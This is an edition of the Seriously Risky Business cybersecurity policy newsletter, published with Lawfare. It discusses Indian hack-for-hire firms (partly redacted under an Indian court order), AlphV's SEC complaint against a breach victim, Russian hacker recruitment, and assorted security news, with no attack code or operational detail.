The Hack-for-Hire Industry: Death by a Thousand Cuts + When Theft Doesn't Work... Troll

Editor’s Note: This newsletter is part of a collaboration between Lawfare and Risky Business. You can find the full version of the Seriously Risky Business newsletter and previous editions on Substack. This newsletter is edited for Lawfare by Eugenia Lostri.

Editor's Note: On Dec. 28, 2023, Lawfare received a letter notifying us that the Reuters story summarized in this article had been taken down pursuant to court order in response to allegations that it is false and defamatory. The letter demanded that we retract this post as well. The article in question has, indeed, been removed from the Reuters web site, replaced with a notice that "Reuters has temporarily removed the article 'How an Indian startup hacked the world' to comply with a preliminary court order issued on Dec. 4, 2023, in a district court in New Delhi, India. Reuters stands by its reporting and plans to appeal the decision." Neither Lawfare nor Seriously Risky Business takes any position on the merits of the litigation in India. But we have redacted material drawn from the Reuters article in question pending further developments in this matter.

The Hack-for-Hire Industry: Death by a Thousand Cuts

Reuters has published a report describing [XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

In a report last year Reuters revealed that email providers had provided access to a database of more than 80,000 emails sent by Indian hacking firms. [XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX] went on to be involved in BellTrox (aka Dark Basin), which Citizen Lab reported on back in 2020. BellTrox was at the centre of a Reuters investigation last year that showed how hack-for-hire firms were employed in an attempt to steal information that was used to influence litigation.

Citizen Lab's report describes the breadth of BellTrox's targeting:

Dark Basin has a remarkable portfolio of targets, from senior government officials and candidates in multiple countries, to financial services firms such as hedge funds and banks, to pharmaceutical companies. Troublingly, Dark Basin has extensively targeted American advocacy organisations working on domestic and global issues. These targets include climate advocacy organisations and net neutrality campaigners.

Meta examined CyberRoot, another Applin offshoot, in its report on the Surveillance-for-hire industry and found similarly voracious targeting:

Our investigation found CyberRoot target people around the world, working in a wide range of industries including cosmetic surgery and law firms in Australia, real-estate and investment companies in Russia, private equity firms and pharmaceutical companies in the US, environmental and anti-corruption activists in Angola, gambling entities in the UK, and mining companies in New Zealand. They were focused on business executives, lawyers, doctors, activists, journalists and members of the clergy in countries like Kazakhstan, Djibouti, Saudi Arabia, South Africa and Iceland. Our investigation corroborates the assessment by investigative journalists at Reuters that this group often targeted people involved in litigation, likely on behalf of law firms.

This feels a bit like a death by a thousand cuts. Each hack-for-hire incident exposed is troubling but is difficult to prosecute given the global nature of the industry and its use of private investigators and law firms as cutouts. But when summed up over time, the industry as a whole is a terrible scourge that undermines the rule of law by subverting legal processes.

If Data Theft Doesn't Work… Troll

The AlphV ransomware group has filed a US Securities and Exchange Commission (SEC) complaint against one of its victims for failing to disclose that it had been breached.

In the words of AlphV's submission, the victim company MeridianLink "failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules".

According to AlphV, the group breached MeridianLink on November 7 and stole files but did not encrypt company systems.

Even beyond the submission being a ridiculous troll, there are also a few more pedantic problems with AlphV's submission. The SEC's four-day disclosure rules don't actually come into effect until the middle of December and they only apply if the company decides the breach is material. MeridianLink told DataBreaches.net, "based on our investigation to date, we have identified no evidence of unauthorised access to our production platforms, and the incident has caused minimal business interruption". So it doesn't sound like a material incident anyway.

It also looks like AlphV missed a trick here and doesn't appear to have applied for the SEC's whistleblower reward program. This scheme is designed to encourage whistleblowing and monetary fines from SEC enforcement actions that result from submissions can be shared with the whistleblower. This would have been even more absurd and potentially more effective since this caper was all about using publicity to place extra pressure on MeridianLink.

However, cybersecurity professionals and companies should be aware there could be a real opportunity for ransomware groups to apply more pressure here. The SEC's recent case against SolarWinds and its CISO is based on how the company's cyber security practices didn't match the company's public statements. Perhaps the opportunity for ransomware groups is to write penetration testing reports describing weaknesses in a company's cyber security defences and contrasting those findings with the victim's public statements (such as the boilerplate 'we take cyber security extremely seriously'….etc). They could then threaten to send this report to the SEC.

Russia’s War for (Hacking) Talent

The Record has published a recent interview with Victor Zhora, the former deputy head of the Ukraine's cyber security agency (the SSSCIP) discussing the evolving tactics of Russian cyber operations. (The day after the interview took place Zhora was reportedly dismissed from the SSSCIP amid an embezzlement investigation).

Most interestingly, Zhora commented on the difficulties that Russia has recruiting cyber talent, and that it is trying to build a talent pipeline from high schools and volunteer communities. Russia suffered a significant brain drain at the beginning of the invasion as skilled people left the country and this made it difficult for its cyber organisations to grow their capabilities.

He told The Record that, as a result, "they are putting focus on younger people because it's the only way for Russia to scale up and maintain the same intensity of cyberattacks".

Zhora also said that Russian groups were also scouring Telegram channels, presumably ones in which patriotic Russian hacktivists organise their activities:

One way of engaging people to cyber offensive operations against Ukraine and our partners is seeking for talents in different Telegram channels where there’s always an officer of [the] FSB [Federal Security Service] or GRU [military intelligence] searching for the most skilled people and then inviting them to more official military structures.

There is already good evidence of coordination between Russian military intelligence and the country's hacktivist groups. However, it's difficult to trust unvetted groups of internet strangers with important cyber operations, so it makes sense to cherry pick (and vet) talented individuals for more important work.

Zhora also recapped trends in Russian cyber operations that we've covered before. These include that Russian state groups remain focused on Ukrainian critical infrastructure and government organisations, but have shifted from disruptive operations to cyber espionage and data exfiltration. They've also shifted toward 'living off the land' approaches that rely on abusing legitimate tools that are already present in the host environment. 

Three Reasons to Be Cheerful This Week:

1. US SIM swap requirements strengthened: The US Federal Communications Commission (FCC) has adopted new rules intended to protect US wireless telecommunications customers from SIM swap fraud. The new rules say wireless providers must use "secure methods of authenticating a customer", but don't specify what these secure methods are — it's up to providers to figure that out. The FCC writes "while the approach we take today gives wireless providers the flexibility to adapt to evolving threats, it also creates an obligation that they adapt to those threats". [Risky Business News has more coverage]
2. Hack-for-hire intermediary sentenced: An Israeli private investigator, Aviram Azari, has been sentenced to 80 months in prison for organising global hacking campaigns. Prosecutors say Azari's clients paid him more than USD$4.8m over five years for organising the campaigns. Notable campaigns targeted individuals critical of now-defunct German payment processing company Wirecard and also climate activists who were campaigning against Exxon Mobil. One of the hack-for-hire firms Azari used was Indian firm BellTrox. 
3. Binance pinged for USD$4.3bn: Binance, the world's largest cryptocurrency exchange, will pay USD$4.3bn to settle violations of US anti-money laundering law. Its CEO Changpeng Zhao (aka CZ) will also step down. We are calling this good news because the terms of the settlement will help clamp down on ransomware payments. The US Treasury Department said that Binance didn't report ransomware payments despite "transacting millions of dollars of ransomware proceeds involving at least 24 different strains of ransomware".

Shorts

Bloomberg analysed hundreds of viral posts on X, the website formerly known as Twitter, relating to the Israel/Hamas conflict and found that the site's efforts to address misinformation were not keeping up with the speed with which misleading posts were going viral. 

Since Elon Musk's takeover of Twitter he has dismantled much of the company's trust and safety function, so mechanisms it previously used to manage misinformation don't exist any more.

One recent innovation that attempts to address misinformation on the platform is 'Community Notes', a mechanism that gathers other X users' opinions to add context to posts and flag them as potentially misleading.

In theory, this could work because it harnesses users to address misinformation more broadly than a centralised Twitter team ever could. However, Bloomberg found that Community Notes correcting or adding context to posts typically appeared hours or even days after misleading posts had gone viral. Often these posts contained photos or videos that were repurposed from other conflicts (or even video games) and appear to be designed to be deliberately inflammatory.

Of course, Twitter's former role as a site to follow breaking news events is at odds with the slower pace that would come with the careful assessment of posts for misinformation.

German digital technology think tank SNV (Stiftung Neue Verantwortung) has published a paper on how states should responsibly conduct 'Active Cyber Defence' operations. Its definition of active cyber defence is pretty broad and encompasses state action that ranges from telling ISPs to block or sinkhole malicious traffic to what this newsletter calls ‘offensive cyber operations’ designed to disrupt cyber criminals, as per the UK's National Cyber Force.

Some states already carry out these kinds of operations and we expect that over time more states will take part. The paper is a sensible policy blueprint on how states can join the party.

Now here's an AI-enabled scam that will work. In this video attorney Gary Schildhorn describes a scam which started with a phone call from his son saying that he'd been in a car accident in which he'd broken his nose and injured a pregnant woman.

The AI technology required is the ability to clone a voice, which could then be combined with a soundboard to trigger pre-prepared phrases. But this is a targeted attack that requires the scammers to do some homework beforehand. Firstly, the scammers need to identify individuals with enough speech available online such that their voice can be cloned. They then need to find relatives and contact details. But once they've done that we suspect their success rate will be pretty good.

The Australian government released its latest cyber security strategy this week and on the whole we approve.

The strategy takes a defence-in-depth approach framing with six 'cyber shields' ranging from "strong businesses and citizens" to "protected critical infrastructure". The third shield, "World-class threat sharing and blocking", is interesting. It takes a 'fortress Australia' approach and aims for whole-of-economy threat intelligence sharing, coupled with threat blocking at ISPs and telcos.

The strategy extends out to 2030, however, and there are not a lot of new funds given the extended time frame. A reasonable chunk of the new money is allocated to help Pacific countries both improve their cyber security and also to respond to crises.

Risky Biz Talks

You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (RSS, iTunes or Spotify). 

In our last "Between Two Nerds" discussion Tom Uren and The Grugq discuss how being more open about cyber security threats is great for marketing but has also forced cyber security companies to pick sides and make value judgements.

From Risky Biz News:

DIALStranger vulnerabilities disclosed after four years: Turkish security researcher Yunus Çadirci has discovered vulnerabilities in the DIAL protocol and misconfigurations in vendor equipment that can be used to force TVs and other capable devices into forcibly playing an attacker's video content.

The DIALStranger flaws were discovered way back in 2019, but Çadirci kept the original report private for four years as the protocol received patches and vendors slowly updated devices.

[more on Risky Business News, including how the flaw could be used for "mass-rickrolling"]

NTMC leak: Bangladesh intelligence agency NTMC has left a sensitive database exposed on the internet and leaked the personal details of an unknown number of citizens. The leaked data contained more than 120 data points for each citizen, ranging from real names to Twitter IDs, criminal records, and phone call records. Discovered by Viktor Markopoulos of CloudDefense.AI, the researcher says he reported the database to Bangladesh officials, but the server was never secured. Instead, it was wiped and replaced with a ransom demand, presumably in an automated attack. [Additional coverage in Wired]

Tor Project removes 1k relays linked to cryptocurrency scheme: The Tor Project has removed an estimated 1,000 relay servers from its network, citing their involvement with a for-profit cryptocurrency scheme.

The scheme allegedly promised cryptocurrency tokens for users who set up and ran Tor relays.

In a blog post on Monday, Tor admins said they removed participating servers to protect the integrity and reputation of their project. The removal was subject to a community vote that passed last week.

[more on Risky Business News, including Tor's funding sources]